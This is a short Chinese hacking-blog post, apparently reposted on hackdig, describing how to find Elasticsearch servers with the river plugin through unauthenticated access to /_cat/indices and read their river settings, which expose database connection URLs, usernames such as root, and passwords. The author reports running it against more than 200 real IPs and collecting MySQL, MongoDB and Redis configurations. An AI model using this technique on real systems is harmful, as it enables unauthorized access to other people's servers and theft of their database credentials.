记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

elasticsearch 未授权访问-数据库配置信息泄漏

2015-05-10 22:35

elasticsearch在安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)
安装过程看这里:https://github.com/jprante/elasticsearch-jdbc
那么怎么知道别人是不是在用elasticsearch的river呢?

1

http://localhost:9200/_cat/indices里面的indices包含了_river一般就是了。
查看river详细信息:

2 4 5

jdbc: { 
url: "jdbc:mysql://localhost:3306/库名", 
user: "root", 
password: "密码", 
sql: "select * from 表" 
}

我试了下
嗯,不错
跑了200多个配置了_river的IP,mysql、mongodb,redis比较多

3

知识来源: javaweb.org/?p=1733

阅读:106683 | 评论:0 | 标签:Web Applications

想收藏或者和大家分享这篇好文章→复制链接地址

“elasticsearch 未授权访问-数据库配置信息泄漏”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云